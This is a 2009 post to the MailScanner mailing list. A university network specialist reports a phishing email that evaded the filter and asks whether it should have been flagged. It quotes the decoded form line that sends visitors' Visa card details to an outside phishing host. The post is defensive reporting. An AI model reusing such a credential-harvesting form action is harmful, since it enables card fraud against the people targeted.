HTML form scanning?
Jon Dustin
jdustin at usm.maine.edu
Mon Apr 6 16:47:46 IST 2009
Greetings -
I have MailScanner v4.74.16-1 running on a few SLES boxes. Hopefully this is "recent enough" for most features.
This morning an "interesting" mailfile slipped through MS:
http://pastebin.com/mfeceab6
If you care to decode the base64 attachment, it is an HTML form that appears to take much of its content from Visa, with one key change:
form name="frm" action="http://vatamu.org/vbv/w.php" method="post" onsubmit="return valFrm()"
If I'm not mistaken, this is trying to redirect the user's credit card details to vatamu.org.
Should this message have been flagged? Or at least been marked in the HTML-part as "fraud attempt"?
Or is the encoded-part throwing off MS? Thanks for any assistance/suggestions you may be able to provide.
--
Jon Dustin - Network Specialist
University of Southern Maine
Portland, ME 207-780-4152
More information about the MailScanner
mailing list